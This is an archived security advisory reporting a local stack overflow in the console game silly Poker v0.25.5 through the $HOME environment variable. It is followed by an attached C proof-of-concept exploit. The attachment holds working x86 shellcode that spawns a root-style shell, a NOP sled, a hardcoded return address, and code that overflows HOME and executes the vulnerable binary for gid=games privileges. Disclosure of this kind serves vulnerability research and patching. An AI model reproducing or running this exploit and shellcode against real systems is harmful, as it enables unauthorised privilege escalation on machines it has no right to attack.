01100011 - code 'security research team'
- ----------------------------------------
- - http://www.c-code.net
- - Advisory and PoC exploit by: demz // demz@c-code.net
- - Vulnerable source: silly Poker v0.25.5
- - Bug type: Stackoverflow
- - Priority: 3
- ----------------------------------------
[01] Description
[02] Vulnerable
[03] Proof of concept
[04] Vendor response
[01] Description
silly Poker is a simple yet comprehensive player vs. computer =
console poker game, written in C++.
silly Poker contains an $HOME environment variable stack overflow,
this can be exploited very simple to execute arbitrary code with =
gid=3Dgames privileges.
[02] Vulnerable
Vulnerable and exploitable version, tested on Debian 3.1:
=20
- silly Poker v0.25.5
Maybe also prior versions are vulnerable.
Source can be found at: =
http://www.colby.edu/personal/k/kmradlof/sillypoker/
[03] Proof of concept
peyote:/home/demz/audit$ ./c-sillyPoker
silly Poker v0.25.5 local exploit
---------------------------------------- demz @ c-code.net --
sh-2.05a#
A proof of concept exploit can be found at:
http://www.c-code.net/Releases/Exploits/c-sillyPoker.c
[04] Vendor response
The vendor is informed.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQE/eLePTfcKihbfHWwRAomtAJ9Ed63AGeVhBZI5D5Tuo9IZC7k8NQCdHwzs
DBzstkA7yk/U9wl+S2wssw4=3D
=3DKeFB
-----END PGP SIGNATURE-----
------=_NextPart_000_0038_01C387B0.237D1660
Content-Type: application/octet-stream;
name="c-sillyPoker.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="c-sillyPoker.c"
/* c-sillyPoker.c=0A=
*=0A=
* PoC exploit made for advisory based uppon an local stack based =
overflow.=0A=
* Vulnerable versions, maybe also prior versions:=0A=
*=0A=
* silly Poker v0.25.5=0A=
*=0A=
* Tested on: Debian 3.1=0A=
*=0A=
* Advisory source: c-code.net (security research team)=0A=
* http://www.c-code.net/Releases/Advisories/c-code-adv002.txt=0A=
*=0A=
* ---------------------------------------------=0A=
* coded by: demz (c-code.net) (demz@c-code.net)=0A=
* ---------------------------------------------=0A=
*=0A=
*/=0A=
=0A=
#include <stdio.h>=0A=
#include <stdlib.h>=0A=
=0A=
char shellcode[]=3D=0A=
=0A=
"\x31\xc0" // xor eax, eax=0A=
"\x31\xdb" // xor ebx, ebx=0A=
"\x31\xc9" // xor ecx, ecx=0A=
"\xb0\x46" // mov al, 70=0A=
"\xcd\x80" // int 0x80=0A=
=0A=
"\x31\xc0" // xor eax, eax=0A=
"\x50" // push eax=0A=
"\x68\x6e\x2f\x73\x68" // push long 0x68732f6e=0A=
"\x68\x2f\x2f\x62\x69" // push long 0x69622f2f=0A=
"\x89\xe3" // mov ebx, esp=0A=
"\x50" // push eax=0A=
"\x53" // push ebx=0A=
"\x89\xe1" // mov ecx, esp=0A=
"\x99" // cdq=0A=
"\xb0\x0b" // mov al, 11=0A=
"\xcd\x80" // int 0x80=0A=
=0A=
"\x31\xc0" // xor eax, eax=0A=
"\xb0\x01" // mov al, 1=0A=
"\xcd\x80"; // int 0x80=0A=
=0A=
int main()=0A=
{=0A=
unsigned long ret =3D 0xbffffb44;=0A=
=0A=
char buffer[1028];=0A=
int i=3D0;=0A=
=0A=
memset(buffer, 0x90, sizeof(buffer));=0A=
=0A=
for (0; i < strlen(shellcode) - 1;i++)=0A=
buffer[500 + i] =3D shellcode[i];=0A=
=0A=
buffer[1028] =3D (ret & 0x000000ff);=0A=
buffer[1029] =3D (ret & 0x0000ff00) >> 8;=0A=
buffer[1030] =3D (ret & 0x00ff0000) >> 16;=0A=
buffer[1031] =3D (ret & 0xff000000) >> 24;=0A=
buffer[1032] =3D 0x0;=0A=
=0A=
printf("\nsilly Poker v0.25.5 local exploit\n");=0A=
printf("---------------------------------------- demz @ =
c-code.net --\n");=0A=
=0A=
setenv("HOME", buffer, 1);=0A=
=0A=
execl("/usr/bin/sillypoker", "sillypoker", NULL);=0A=
}=0A=
=0A=
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
